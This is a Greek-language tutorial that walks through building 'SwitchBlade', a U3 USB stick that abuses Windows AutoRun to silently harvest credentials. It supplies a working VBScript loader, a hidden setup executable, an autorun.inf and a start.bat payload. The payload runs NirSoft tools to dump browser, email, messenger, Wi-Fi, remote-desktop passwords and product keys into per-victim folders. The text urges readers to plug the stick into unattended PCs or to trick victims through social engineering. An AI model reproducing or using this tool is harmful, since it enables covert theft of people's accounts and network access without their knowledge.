Το προφίλ μας στο Google Plus
26

Επιχείρηση SwitchBlade: Το καρφώνεις και τελειώνεις!

Η φυσική πρόσβαση παραμένει ο πιο αποδοτικός τρόπος για κάποιον που θέλει να… δανειστεί πολύτιμες πληροφορίες από ένα ξένο μηχάνημα. Πολλές φορές όμως, οι ευκαιρίες για φυσική πρόσβαση είναι -εκτός από σπάνιες- και χρονικά περιορισμένες, με τον επίδοξο ληστή να έχει στην διάθεσή του μόλις λίγα λεπτά απαρατήρητης πρόσβασης στον «δανεικό» υπολογιστή.

Το SwitchBlade είναι ένα ειδικά διαμορφωμένο USB stick, το οποίο διευκολύνει σημαντικά αυτού του είδους τις επιθέσεις σε υπολογιστές με Windows. Ο επιτιθέμενος αρκεί απλά να το συνδέσει σε μια ελεύθερη θύρα του υπολογιστή, να περιμένει μερικά δευτερόλεπτα και να το αφαιρέσει, σίγουρος πλέον ότι όσες ευαίσθητες πληροφορίες ήθελε να «τραβήξει» από το μηχάνημα έχουν αποθηκευτεί ήδη μέσα στο stick αυτόματα, χωρίς ο ίδιος να ακουμπήσει πληκτρολόγιο και ποντίκι ή να έχει οποιαδήποτε άλλη αλληλεπίδραση με τον υπολογιστή. Γρήγορο, αποδοτικό και χωρίς καν ένα δαχτυλικό αποτύπωμα. Ενδιαφέρον; Read on…

Η λειτουργία ενός SwitchBlade βασίζεται σε δύο υποσυστήματα, αυτό που είναι υπεύθυνο για την αυτόματη εκκίνηση των διαδικασιών (loader) και εκείνο που αποτελείται από τα εργαλεία που είναι υπεύθυνα για τις διαδικασίες αυτές (payload). Με λίγα λόγια, όταν το SwitchBlade συνδέεται στη θύρα USB ενός υπολογιστή με Windows, αρχικά ο loader αναλαμβάνει να ξεγελάσει το σύστημα AutoRun/AutoPlay του λειτουργικού ώστε να εκτελεστεί αυτόματα το payload. Το δε payload αναλαμβάνει να εκτελέσει τις κακόβουλες διαδικασίες που επιθυμεί ο δημιουργός του SwitchBlade, όπως υποκλοπές ευαίσθητων πληροφοριών (π.χ. passwords ή συγκεκριμένα αρχεία), δημιουργία κερκόπορτας (π.χ. εγκατάσταση trojan ή κάποιου remote access server όπως το vnc ή δημιουργία ενός νέου, κρυφού user account στα Windows) ή ότι άλλο βάλει ο νους του.

To SanDisk Cruzer Micro είναι το πιο γνωστό USB stick τεχνολογίας U3. Το πτυσσόμενο USB φις που διαθέτει θυμίζει στιλέτο, γεγονός που χάρισε στο SwitchBlade το όνομά του.Για να φτάσουμε στην κατασκευή του δικού μας SwitchBlade πρέπει πρώτα να δούμε πως λειτουργεί το σύστημα AutoRun/AutoPlay των Windows, το σύστημα U3 SmartDrive και στην συνέχεια να φτιάξουμε τα δικά μας loader και payload. Ας πάρουμε όμως τα πράγματα με την σειρά.

Windows & AutoRun/AutoPlay

Το σύστημα AutoRun πρωτοεμφανίστηκε στα Windows95 με σκοπό την αυτόματη εκτέλεση εφαρμογών τοποθετημένων σε αφαιρούμενα αποθηκευτικά μέσα, όταν τα μέσα αυτά συνδέονταν με τον υπολογιστή. Τον καιρό εκείνο βέβαια το πρωτόκολλο USB ήταν στα γεννοφάσκια του και δεν υπήρχαν ακόμα εξωτερικές μονάδες αποθήκευσης USB και έτσι ως αφαιρούμενα αποθηκευτικά μέσα νοούνταν αποκλειστικά τα οπτικά μέσα, δηλαδή τα CD και αργότερα τα DVD.
Το σύστημα AutoRun δούλευε απλά. Ο δημιουργός του CD/DVD έπρεπε να τοποθετήσει ένα αρχείο με όνομα autorun.inf στον γονικό φάκελο του δίσκου. Μέσα σε αυτό το απλό αρχείο κειμένου έπρεπε, μεταξύ άλλων δευτερευόντων οδηγιών, να περιέχεται και η οδηγία για το εκτελέσιμο αρχείο που περιέχεται στον δίσκο και το οποίο πρέπει να τρέξει αυτόματα όταν το δισκάκι εισαχθεί στον οδηγό ανάγνωσης. Για παράδειγμα, το αρχείο autorun.inf που υπάρχει στο CD εγκατάστασης του παιχνιδιού StarCraft έχει τα εξής περιεχόμενα:

[autorun]
OPEN=SETUP.EXE
ICON=SC.ICO

Όταν ο χρήστης βάλει το CD αυτό στο drive, τα Windows διαβάζουν το αρχείο autorun.inf και σύμφωνα με την δεύτερη γραμμή εκτελούν το αρχείο SETUP.EXE που βρίσκεται στο CD αυτόματα, ενώ σύμφωνα με την τρίτη γραμμή αναθέτουν το εικονίδιο SC.ICO ως εικονίδιο του συγκεκριμένου drive στον Explorer.
Με αυτόν τον τρόπο λειτουργίας, οποιοσδήποτε μπορεί να δημιουργήσει πανεύκολα ένα CD/DVD που να εκτελεί αυτόματα κακόβουλες εργασίες όταν εισάγεται στο drive. Με το πέρασμα του χρόνου όμως και την έλευση των επόμενων εκδόσεων Windows, καθώς και τα Service Pack τους και τα διάφορα HotFix που εξέδωσε η Microsoft, το σύστημα AutoRun άλλαξε σημαντικά την προκαθορισμένη συμπεριφορά του. Η συμπεριφορά αυτή μάλιστα διαφοροποιείται και σε επίπεδο τύπου αφαιρούμενης συσκευής με το λειτουργικό να αντιδρά διαφορετικά όταν εισάγεται λόγου χάρη ένα CD σε ένα drive ή όταν συνδέεται ένας εξωτερικός δίσκος USB στο μηχάνημα. Και σαν να μην έφτανε αυτό, τα πράγματα έγιναν ακόμα πιο περίπλοκα όταν – από τα Windows XP και μετά – το σύστημα AutoRun κατέληξε υποσύστημα του ευρύτερου συστήματος AutoPlay, το οποίο κατά την εισαγωγή ενός αφαιρούμενου μέσου στον υπολογιστή, σαρώνει τα περιεχόμενα με σκοπό να αναγνωρίσει τον τύπο τους και στην συνέχεια εμφανίζει στον χρήστη ένα μενού με προτεινόμενες ενέργειες ανάλογα με τα ευρήματα.

Το παράθυρο ρυθμίσεων AutoRun/AutoPlay του Control Panel των Windows Vista. Οι σημειωμένες με κόκκινο ρυθμίσεις είναι απαραίτητες για την αυτόματη εκτέλεση προγραμμάτων από CD/DVD σύμφωνα με τις οδηγίες του autorun.inf. Η πρώτη είναι τσεκαρισμένη by default μετά την εγκατάσταση των Windows.Αν η δεύτερη επιλογή στην διπλανή εικόνα έχει αφεθεί στο Ask me every time που είναι το default, αμέσως μετά την εισαγωγή ενός CD/DVD θα εμφανιστεί αυτό το παράθυρο, στο οποίο αν πατήσετε απλά το πλήκτρο Enter, τα Windows θα ακολουθήσουν πάλι τις οδηγίες του autorun.inf. Διαφορετικά τα Vista θα συμπεριφερθούν όπως τα XP και όλα θα τρέξουν αυτόματα, χωρίς να εμφανιστεί αυτό το παράθυρο και χωρίς την παραμικρή παρέμβαση από μέρους σας.
Ο πίνακας που ακολουθεί συνοψίζει την προκαθορισμένη συμπεριφορά του συστήματος AutoRun/AutoPlay στις πιο πρόσφατες εκδόσεις των Windows και για τους διαφορετικούς τύπους αφαιρούμενων αποθηκευτικών μέσων:

Windows 2000 Windows XP (μέχρι και SP1) Windows XP (SP2 και SP3) Windows Vista
Οπτικός δίσκος (CD, DVD κ.λπ.) To autorun.inf διαβάζεται και το εκτελέσιμο του ορίσματος open εκτελείται αυτόματα. Το autorun.inf διαβάζεται αλλά το εκτελέσιμο του ορίσματος open δεν εκτελείται αυτόματα. Η εκτέλεση παρουσιάζεται ως επιλογή στο μενού του AutoPlay αν το εκτελέσιμο του ορίσματος open έχει ειδική ονομασία (π.χ. setup.exe). Επίσης στον χρήστη παρουσιάζεται η επιλογή να γίνεται αυτόματα η εκτέλεση πλέον για κάθε δίσκο που εισάγεται. (Δείτε τη σχετική εικόνα)
Αφαιρούμενη αποθηκευτική συσκευή USB, FireWire κ.λπ. Το autorun.inf διαβάζεται αλλά το εκτελέσιμο του ορίσματος open αγνοείται και δεν υπάρχει αυτόματη εκτέλεση. Το autorun.inf διαβάζεται αλλά το εκτελέσιμο του ορίσματος open δεν εκτελείται αυτόματα. Η εκτέλεση παρουσιάζεται ως επιλογή στο μενού AutoPlay αν υπάρχει το ειδικό όρισμα action στο autorun.inf αλλά δεν δίνεται η επιλογή στον χρήστη να γίνεται πλέον αυτόματα η εκτέλεση για κάθε νέο εξωτερικό δίσκο που εισάγεται.

Όπως φαίνεται στον πίνακα η δημιουργία ενός οπτικού δίσκου με περιεχόμενο που εκτελείται αυτόματα, χωρίς ανθρώπινη παρέμβαση είναι πολύ πιο εύκολη από την δημιουργία ενός αντίστοιχου USB Stick. Το μοναδικό πρόβλημα παρουσιάζεται στα Windows Vista, αλλά ακόμα και εκεί, το πρόβλημα μπορεί να ξεπεραστεί εύκολα με ελάχιστη αλληλεπίδραση από τον χρήστη μέχρι να επιλέξει την πρώτη επιλογή στο μενού του AutoPlay (δείτε τη σχετική εικόνα). Και πιθανότατα αυτό να μην χρειαστεί καν, αν ο νόμιμος χρήστης του υπολογιστή είχε επιλέξει να γίνεται αυτόματα αυτή η διαδικασία την τελευταία φορά που έβαλε ένα δισκάκι με δικό του autorun.inf, όπως π.χ. ένα παιχνίδι.
Απεναντίας, κατά την σύνδεση ενός USB stick που περιέχει autorun.inf, τίποτα δεν θα εκτελεστεί αυτόματα σε καμία έκδοση των Windows, εκτός και αν ο νόμιμος χρήστης έχει κάνει κάποιες αρκετά εξεζητημένες αλλαγές στην registry (πρέπει να το ζητάει ο οργανισμός του!).
Μα εμείς θέλουμε να φτιάξουμε ένα SwitchBlade και όχι κάποιο CD! Έτσι δεν είναι; Πρόβλημα λοιπόν; Για να δούμε…

Σύστημα U3 SmartDrive

Το σύστημα U3 είναι ένα σύστημα φορητών εφαρμογών (portable apps) για USB stick. Τα USB stick που υποστηρίζουν την συγκεκριμένη τεχνολογία περιέχουν το πρόγραμμα U3 Launchpad που δρα παρόμοια με το μενού Start των Windows, εμφανίζοντας τις φορητές εφαρμογές που έχουν εγκατασταθεί στο stick (και είναι συμβατές με το σύστημα U3) ενώ δίνει στον χρήστη την δυνατότητα να κατεβάσει και να εγκαταστήσει νέες φορητές εφαρμογές από τον ειδικό ιστοτόπο (www.u3.com).
Για την δική μας εφαρμογή ωστόσο, η ορθόδοξη χρήση του συστήματος U3 δεν μας ενδιαφέρει καθόλου και έτσι τα παραπάνω είναι ασήμαντα. Αυτό που παρουσιάζει ενδιαφέρον είναι τα ίδια τα USB stick που υποστηρίζουν την τεχνολογία U3, ως hardware.
Κατά την σύνδεσή τους με τον υπολογιστή, τα κοινά USB stick αναγνωρίζονται ως μονάδες μαζικής αποθήκευσης (mass storage device) και το μοναδικό filesystem που περιέχουν γίνεται mount από τα Windows. Όμως ένα stick που υποστηρίζει το σύστημα U3 αναγνωρίζεται από τον υπολογιστή ως ένα USB Hub το οποίο έχει πάνω του συνδεδεμένες δύο συσκευές:

  • μια μονάδα μαζικής αποθήκευσης (ώστε να λειτουργεί ως ένα κοινό USB stick)
  • μια εξωτερική μονάδα ανάγνωσης CD

Το παράθυρο ασφαλούς αφαίρεσης συσκευών με δύο USB stick συνδεδεμένα, ένα απλό Kingston DataTraveler και ένα SanDisk Cruzer Micro τεχνολογίας U3. Παρατηρήστε ότι σε αντίθεση με το Kingston, το SanDisk έχει αναγνωριστεί ως δύο διαφορετικές συσκευές, ένα δίσκο και ένα CD-ROM (προσέξτε τα εικονίδια), ενώ του έχουν ανατεθεί και δύο drive letter αντί για ένα.Έτσι, μετά την σύνδεση ενός U3 stick σε ένα Windows υπολογιστή, στον Explorer εμφανίζονται δύο νέα drive αντί για ένα. Το πρώτο έχει την μορφή αφαιρούμενου δίσκου και λειτουργεί αναμενόμενα. Το δεύτερο είναι ένα CD Drive, στο οποίο μάλιστα έχει εισαχθεί και δίσκος CD! Αν επιλέξετε να δείτε τα περιεχόμενα αυτού του εικονικού CD, θα ανακαλύψετε ότι περιέχει το πρόγραμμα U3 LaunchPad του συστήματος U3.
Αυτό που πραγματικά συμβαίνει είναι ότι το σύστημα U3 δεσμεύει ένα μικρό μέρος του χώρου από το ειδικό stick για να αποθηκεύσει το image ενός CD που περιέχει το LaunchPad. Κατά την σύνδεση του stick στον υπολογιστή, το firmware του ειδικού αυτού stick κάνει mount το image αυτό στην εικονική μονάδα ανάγνωσης CD που δημιουργεί στον υπολογιστή.

Το concept

Ήδη πρέπει να έχετε αρχίσει να μυρίζεστε την συλλογιστική:

  1. Η δημιουργία CD που εκτελεί αυτόματα κακόβουλες εργασίες δεν ενδιαφέρει γιατί δεν υπάρχει η δυνατότητα εγγραφής των κλεμμένων πληροφοριών.
  2. Έτσι, προτιμάται ένα αντίστοιχο USB stick.
  3. Αλλά παρότι το AutoRun είναι «τρύπιο» όσον αφορά στα CD, έχει αυστηρή πολιτική για τις συσκευές USB.
  4. Όμως υπάρχει ένα ειδικό USB stick, το U3 USB stick, που μπορεί να εξομοιώσει ένα εικονικό CD και να λειτουργεί παράλληλα και ως απλό εγγράψιμο stick.

Αυτό που πρέπει να κάνετε λοιπόν είναι να πάρετε ένα U3 USB Stick, να δημιουργήσετε τα υποσυστήματα loader και payload και να εγκαταστήσετε το πρώτο στο εικονικό CD drive του stick και το δεύτερο στο εγγράψιμο μέρος του stick. Με αυτόν τον τρόπο, κατά την εισαγωγή του SwitchBlade σε ένα υπολογιστή, ο loader θα εκτελείται αυτόματα (αφού θα αναγνωρίζεται ως CD από το AutoRun) και με την σειρά του θα εκτελεί το payload το οποίο θα μπορεί να αποθηκεύσει τα «λάφυρα» αφού εκτελείται από το κανονικό/εγγράψιμο μέρος του stick.
Το μειονέκτημα αυτής της μεθόδου είναι ότι, αν δεν έχετε ήδη, θα πρέπει να προμηθευτείτε ένα ειδικό stick που να υποστηρίζει την τεχνολογία U3. Τα πιο κοινά U3 USB stick είναι τα SanDisk Cruzer Micro, τα οποία έχουν πτυσσόμενο φις USB σε στυλ στιλέτου, γεγονός που χάρισε στο SwitchBlade το όνομά του. Η τιμή ενός U3 USB stick πάντως είναι στα ίδια επίπεδα με ένα απλό stick.

Ο Loader

Η απλή δουλειά του loader είναι, αφού ενεργοποιηθεί, να εκτελέσει κατευθείαν το payload. Για τα Windows όμως, το payload βρίσκεται σε διαφορετική (εικονική) συσκευή από τον loader, δηλαδή σε διαφορετικό drive letter, το οποίο μάλιστα δεν είναι σταθερό αλλά αλλάζει κάθε φορά που το SwitchBlade θα συνδέεται σε κάποιον άλλο υπολογιστή.
Για να λύσετε αυτό το πρόβλημα, αρκεί να δημιουργήσετε ένα windows script, το οποίο να ψάχνει όλα τα drive letter του υπολογιστή για να βρίσκει το payload και να το εκτελεί. Ανοίξτε λοιπόν τον αγαπημένο σας editor και πληκτρολογήστε τις παρακάτω 11 γραμμές κώδικα:

Set ThisFileSystem = CreateObject("Scripting.FileSystemObject")
For Each objDrive in ThisFileSystem.Drives
  If objDrive.IsReady Then
    If ThisFileSystem.FileExists(objDrive.DriveLetter & ":\switchblade\start.bat") Then
      StartPath = objDrive.DriveLetter & ":\switchblade"
      StartBatchFile = StartPath & "\" & "start.bat"
      CreateObject("Wscript.Shell").CurrentDirectory = StartPath
      CreateObject("Wscript.Shell").Run StartBatchFile, 0, False
    End If
  End If
Next

Αποθηκεύστε το αρχείο με όνομα loader.vbs. Το απλό αυτό script ψάχνει ένα-ένα σε όλα τα drive του συστήματος (γραμμή 2) για να βρει αν υπάρχει το αρχείο start.bat στον γονικό φάκελο switchblade (γραμμή 4) και εφόσον υπάρχει το εκτελεί (γραμμή 8).
Τώρα δημιουργήστε ένα batch file που να εκτελεί αυτό το script. Δημιουργήστε νέο αρχείο στον editor σας και πληκτρολογήστε την παρακάτω γραμμή:

wscript .\loader.vbs

Αποθηκεύστε το αρχείο με όνομα setup.bat.
Όταν εκτελείται ένα batch file στα Windows, αυτά εμφανίζουν το παράθυρο της κονσόλας ώστε να εμφανιστεί τυχόν feedback. Θα ήταν καλύτερα αν ούτε ο loader, ούτε το payload εμφάνιζαν κάτι στην οθόνη του υπολογιστή-θύμα.
Αυτή την εικόνα πρέπει να έχει το πρόγραμμα Bat To Exe Converter λίγο πριν κάνετε κλικ στο κουμπί Compile και…Ένας τρόπος για να «σωπάσετε» το setup.bat είναι να το μετατρέψετε σε exe. Κατεβάστε το δωρεάν πρόγραμμα Bat To Exe Converter από εδώ. Εκτελέστε το, επιλέξτε το δικό σας start.bat στο πεδίο Batch File, επιλέξτε Invisible Application στο Visibility και κάντε κλικ στο κουμπί Compile. Ένα αρχείο με όνομα setup.exe θα εμφανιστεί στον φάκελο που βρίσκεται και το setup.bat (το οποίο δεν χρειάζεστε πλέον).  Το όνομα δεν επιλέχτηκε τυχαία αφού, όπως είδατε πριν στον πίνακα, το AutoRun των Vista ευνοεί τα αρχεία με όνομα setup νομίζοντας ότι πρόκειται για εγκατάσταση προγράμματος.
Μένει να δημιουργήσετε και ένα autorun.inf ώστε το setup.exe που μόλις δημιουργήσατε να εκτελείται αυτόματα όταν «εισάγετε» το εικονικό CD, δηλαδή όταν συνδέετε το SwitchBlade. Δημιουργήστε πάλι ένα νέο αρχείο στον editor σας και πληκτρολογήστε τις δύο γραμμές που ακολουθούν:

[Autorun]
open=setup.exe

Αποθηκεύστε το αρχείο ως autorun.inf και ουσιαστικά έχετε δημιουργήσει όλα τα αρχεία που αποτελούν τον loader.

Εγκατάσταση του loader στο U3 USB stick

Εδώ υπάρχει το επόμενο πρόβλημα. Όπως είπαμε ήδη, το κομμάτι του U3 USB stick που αναγνωρίζεται από τα Windows ως CD, υπό κανονικές συνθήκες περιέχει το πρόγραμμα U3 Launchpad και δεν είναι εγγράψιμο. Εσείς όμως πρέπει να βάλετε εκεί μέσα τα 3 αρχεία του loader που μόλις δημιουργήσατε.
Για να λύσετε αυτό το πρόβλημα θα πρέπει να χρησιμοποιήσετε το εργαλείο LPInstaller. Η ορθόδοξη χρήση αυτού του εργαλείου είναι να αντικαθιστά το πρόγραμμα U3 Launchpad που είναι εγκατεστημένο στο U3 USB Stick με την τελευταία έκδοση που κυκλοφορεί, την οποία κατεβάζει αυτόματα από μια προκαθορισμένη τοποθεσία στο internet. Εναλλακτικά -και εδώ είναι το ενδιαφέρον-, αν στον ίδιο φάκελο που βρίσκεται το LPInstaller υπάρχει ένα ειδικά ονομασμένο ISO image, το LPInstaller δεν κατεβάζει τίποτα από το internet αλλά αντικαθιστά το CD image που βρίσκεται στο U3 USB stick με αυτό.
Μπορείτε να κατεβάσετε το LPInstaller από το επίσημο site του U3 ή της SanDisk αλλά δυστυχώς στις πιο πρόσφατες εκδόσεις το ενδιαφέρον χαρακτηριστικό που μόλις αναφέρθηκε έχει αφαιρεθεί, οπότε κατεβάστε μια παλαιότερη έκδοση από το δικό μας site.
…αυτή την εικόνα πρέπει να έχει το πρόγραμμα Image Maker λίγο πριν κάνετε κλικ στο κουμπί Build.Πρώτα βέβαια θα χρειαστεί να βάλετε τα 3 αρχεία του loader σε ένα ISO image. Αν δεν έχετε ήδη ένα πρόγραμμα που να μπορεί να δημιουργεί ISO image κατεβάστε το δωρεάν εργαλείο Image Master. Αφού το εγκαταστήσετε και το τρέξετε, ανοίξτε την καρτέλα Write, σύρετε τα loader.vbs, setup.exe και autorun.inf που φτιάξατε από τον Explorer στο Image Master, πατήστε το Save As και δώστε το όνομα loader.iso στο ISO image που θέλετε να δημιουργηθεί, αφαιρέστε το τικ από την επιλογή UDF και, τέλος, πατήστε το κουμπί Build. Κλείστε το Image Maker – το ISO που θέλατε είναι έτοιμο.
Τα αρχεία του εικονικού CD που εξομοιώνει το σύστημα U3 πριν ακόμα πειράξετε το stick και τα περιεχόμενα του γνήσιου autorun.inf. Στο κόκκινο περίγραμμα βλέπετε τις γραμμές που περιέχουν το “brand=” που ψάχνετε.Τώρα πρέπει να το μετονομάσετε κατάλληλα (από loader.iso) για να αναγνωριστεί από το LPInstaller. Συνδέστε το U3 USB Stick σας (αν δεν το έχετε κάνει ήδη) και από το My Computer κάνετε δεξί κλικ πάνω στο εικονικό CD Drive του U3 και επιλέξτε Open για να εμφανιστούν τα αρχεία του CD image που είναι ήδη εγκατεστημένο στο U3 USB Stick και τα οποία θέλετε να αντικαταστήσετε με τα δικά σας. Ένα από τα αρχεία θα ονομάζεται autorun.inf. Ανοίξτε το με τον editor σας και ψάξτε να βρείτε κάποια γραμμή που να γράφει “brand=” και να ακολουθεί κάποιο αλφαριθμητικό (π.χ. στο δικό μας stick υπήρχε η γραμμή “brand=PelicanBFG”). Μετονομάστε το loader.iso ώστε να έχει την μορφή:

<αλφαριθμητικό που βρήκατε>-autorun.iso

Για παράδειγμα, αν το αλφαριθμητικό που βρήκατε ήταν PelicanBFG, μετονομάστε το loader.iso σε PelicanBFG-autorun.iso.
Αν για οποιοδήποτε λόγο στο υπάρχον CD Image δεν βρείτε αρχείο autorun.inf ή μέσα σε αυτό δεν βρείτε την γραμμή με το “brand=” (για παράδειγμα στην περίπτωση που έχετε ήδη αντικαταστήσει μια φορά το CD image με ένα δικό σας) μετονομάστε το loader.iso σε cruzer-autorun.iso.
Η εκτέλεση του LPInstaller.exe είναι το τελευταίο βήμα για την εγκατάσταση του loader, υπεύθυνο για την εγκατάσταση του ISO στο U3 USB Stick. Σημειώστε ότι η παλιά έκδοση του προγράμματος που αναγκάζεστε να χρησιμοποιήσετε μπορεί να έχει πρόβλημα να αναγνωρίσει το U3 USB Stick σας στα Vista και να χρειαστεί να εγκαταστήσετε το ISO από έναν υπολογιστή που τρέχει τα Windows XP. Όπως βλέπετε στην προειδοποίηση της εικόνας, μην τραβήξετε το stick κατά την διάρκεια της εγκατάστασης γιατί μπορεί να το καταστρέψετε.Αφού το ISO αρχείο σας έχει πλέον το σωστό όνομα, αντιγράψτε το στον ίδιο φάκελο που κατεβάσατε το LPInstaller.exe και εκτελέστε το τελευταίο. Αφού πατήσετε μερικές φορές Next στον wizard που θα εμφανιστεί, το CD image του U3 USB Stick θα αντικατασταθεί με το δικό σας. Κλείστε το LPInstaller και επιβεβαιώστε μέσω του Explorer ότι τα 3 αρχεία του loader σας βρίσκονται πλέον στο εικονικό CD Drive του U3 USB Stick σας.
Σε αυτό το σημείο, μιας και αφαιρέσατε πλέον το U3 Launchpad, καλά είναι να αδειάσετε και το εγγράψιμο μέρος του U3 USB stick από τα υπόλοιπα αρχεία του συστήματος U3 που είναι πια άχρηστα. Εκεί θα εγκατασταθεί το payload.

Το Payload

Εδώ η φαντασία σας μπορεί να οργιάσει και να σχεδιάσετε ένα payload από αθώο έως πραγματικά κακόβουλο. Ο μόνος περιορισμός, σύμφωνα με το loader που δημιουργήσατε, είναι ότι το payload πρέπει να βρίσκεται στον φάκελο switchblade του U3 USB stick και να ξεκινά μέσω ενός batch file με όνομα start.bat.
Μια καλή ιδέα λόγου χάρη είναι να χρησιμοποιήσετε τα εργαλεία ανάκτησης password της NirSoft, για τα οποία διαβάσατε παλαιότερα στο άρθρο «Η εργαλειοθήκη του Windows PowerUser». Αρχικά πλοηγηθείτε στην σελίδα Nirsoft Panel και κατεβάστε τα εκτελέσιμα των ChromePass, Dialupass, IE PassView, Mail PassView, MessenPass, Network Password Recovery, PasswordFox, ProduKey, Remote Desktop PassView και WirelessKey View. Τα προγράμματα αυτά μπορούν να ανακτήσουν:

  • λογαριασμούς από διάφορες online υπηρεσίες όπου ο browser του θύματος (ΙΕ, Firefox, Chrome) έχει ρυθμιστεί να «θυμάται» το password (π.χ. θα πάρετε τα password από Gmail, Hotmail, Facebook, MySpace, Twitter, RapidShare και λοιπές online υπηρεσίες)
  • λογαριασμούς από συνδέσεις dialup (π.χ. αν το θύμα έχει DSL modem αντί για modem/router, θα πάρετε το λογαριασμό του)
  • λογαριασμούς από συνδέσεις του τοπικού δικτύου
  • λογαριασμούς email του θύματος αν αυτός χρησιμοποιεί Outlook, Outlook Express, Windows Mail, Thunderbird, Eudora, Incredimail ή διάφορες online υπηρεσίες
  • λογαριασμούς από τις εφαρμογές Instant Messaging που χρησιμοποιεί το θύμα (Windows/MSN/Live Messenger, ICQ, Google Talk, AOL Messenger, Trillian, Miranda, GAIM)
  • password από τον Remote Desktop Server του θύματος αν τον έχει ενεργοποιήσει (έτσι θα μπορείτε να χειρίζεστε το μηχάνημά του εκ των υστέρων απομακρυσμένα)
  • κλειδιά από αποθηκευμένα ασύρματα δίκτυα (έτσι θα μπορείτε μετά να συνδέεστε σε όλα τα ασύρματα δίκτυα που έχει πρόσβαση το θύμα, συμπεριλαμβανομένου του σπιτικού δικτύου του)
  • product key από τις εφαρμογές Microsoft που είναι εγκατεστημένες στο σύστημα του θύματος (π.χ. τα Windows, το Office, το Visual Studio κ.λπ.)

Για να τα βάλετε στο payload, δημιουργήστε ένα φάκελο με το όνομα switchblade στο U3 USB stick και αντιγράψτε τα 10 εκτελέσιμα που κατεβάσατε μέσα σε αυτόν. Στην συνέχεια ανοίξτε πάλι τον editor σας και πληκτρολογήστε τις 16 παρακάτω γραμμές:

@echo off
set foldername=\switchblade\victims\%computername%-%username%
if not exist %foldername% goto createvictimfolder
rd %foldername% /S /Q
:createvictimfolder
md %foldername%
iepv /shtml %foldername%\InternetExplorerPasswordsReport.html
passwordfox /shtml %foldername%\FirefoxPasswordsReport.html
chromepass /shtml %foldername%\ChromePasswordsReport.html
mailpv /shtml %foldername%\MailAccountsPasswordReport.html
mspass /shtml %foldername%\InstantMessengerPasswordReport.html
dialupass /shtml %foldername%\DialupPasswordReport.html
netpass /shtml %foldername%\NetworkPasswordReport.html
wirelesskeyview /shtml %foldername%\WirelessNetworkPasswordReport.html
rdpv /shtml %foldername%\RemoteDesktopPasswordReport.html
produkey /shtml %foldername%\ProductKeyReport.html

Αποθηκεύστε αυτό το batch file ως start.bat στον φάκελο switchblade που δημιουργήσατε πριν λίγο. Αρχικά (γραμμή 2), το start.bat καθορίζει την τοποθεσία που θα αποθηκευτούν τα προϊόντα της υποκλοπής. Για κάθε υπολογιστή στον οποίο θα εκτελείται, θα δημιουργεί (γραμμή 6) τον υποφάκελο με όνομα [όνομα υπολογιστή]-[όνομα χρήστη], μέσα στον υποφάκελο victims του φακέλου switchblade. Έτσι, αν λόγου χάρη συνδέσετε το SwitchBlade σε ένα υπολογιστή με όνομα DellPC την ώρα που ο ενεργός χρήστης είναι ο Peter, οι πληροφορίες του Peter θα βρίσκονται μετά στον φάκελο /switchblade/victims/DellPC-Peter.
Πριν γίνει αυτό, ελέγχεται μήπως ο φάκελος αυτός υπάρχει ήδη (γραμμή 3) οπότε το SwitchBlade έχει χρησιμοποιηθεί ξανά στον ίδιο υπολογιστή/χρήστη και τότε ο συγκεκριμένος φάκελος αδειάζει (γραμμή 4) για να μπουν τα ενημερωμένα αρχεία.
Αφού ο ειδικός φάκελος για τον συγκεκριμένο υπολογιστή/χρήστη δημιουργηθεί ή αδειάσει, οι γραμμές 7-16 εκτελούν ένα-ένα τα εργαλεία της NirSoft με παράμετρο να αποθηκευτούν τα αποτελέσματα ως αναφορές HTML στον νέο φάκελο.
Ο τρόπος που καλείται το start.bat από τον loader (γραμμή 8 στο loader.vbs) καθιστά σίγουρο ότι η εκτέλεση του αρχείου δεν θα εμφανίσει την κονσόλα των Windows και ότι το start.bat θα εκτελεστεί «σιωπηλά» οπότε τώρα δεν χρειάζεται να επαναλάβετε τις «αλχημείες» που κάνατε για το setup.bat του loader.
Με την αποθήκευση του start.bat, το payload σας είναι πλέον έτοιμο και λειτουργικό.

Χρήση

Η εκτέλεση του συγκεκριμένου payload δεν διαρκεί πάνω από 5~10 sec. Βρείτε ένα αφύλακτο PC, καρφώστε το SwitchBlade, περιμένετε μέχρι το LED κατάστασης να σταματήσει να αναβοσβήνει, οπότε θα έχει τελειώσει η εγγραφή δεδομένων, και τραβήξτε το. Επαναλάβετε για όσους υπολογιστές θέλετε.
Τα αποτελέσματα των «κόπων» σας αποθηκεύονται σε αναφορές HTML στον φάκελο victims. Στην εικόνα βλέπετε μια από τις 10 αναφορές που δημιούργησε το SwitchBlade κατά την εισαγωγή του σε ένα υπολογιστή δοκιμαστικά. Αν δεν είχε παρέμβει το PhotoShop θα βλέπατε τους 24 από τους 85 πολύ αληθινούς λογαριασμούς που «τσίμπησε» το SwitchBlade αποκλειστικά και μόνο μέσω του PasswordFox. Μεταξύ αυτών μερικοί πολύ σημαντικοί όπως Gmail, Paypal, Ebay, Amazon κ.α. Ο υπολογιστής έτρεχε Windows Vista και προστατευόταν από Windows Defender και Avast! Antivirus. Καθώς φαίνεται… δεν ήταν αρκετά.Πολλές φορές το PC δεν χρειάζεται καν να είναι αφύλακτο. Χρησιμοποιήστε social engineering. Ζητήστε από το θύμα να βάλετε ένα λεπτό το στικάκι σας στον υπολογιστή του για να του μεταφέρετε ένα καινούργιο τραγούδι ή κάτι παρόμοιο (μην ξεχνάτε ότι το SwitchBlade παραμένει ένα stick σαν όλα τα άλλα και μπορείτε να αποθηκεύετε μέσα ότι άλλο θέλετε). Ακόμα και αν το θύμα παρακολουθήσει την όλη διαδικασία δεν θα παρατηρήσει τίποτα περίεργο αφού ούτε ο loader, ούτε το payload εμφανίζουν κάτι στην οθόνη. Μπορείτε να κλέβετε τις προσωπικές πληροφορίες του θύματος μπροστά στα μάτια του!
Όταν πάτε στο δικό σας υπολογιστή, κρατήστε πατημένο το πλήκτρο Shift την ώρα που συνδέετε το SwitchBlade πάνω του για να απενεργοποιήσετε το AutoRun και να αποτρέψετε την αυτόματη εκτέλεση του loader. Ανοίξτε τον Explorer και πηγαίνετε στον φάκελο /switchblade/victims για να δείτε «τι ψάρια πιάσατε»!.

Το θύμα έχει antivirus; Μην απελπίζεστε…

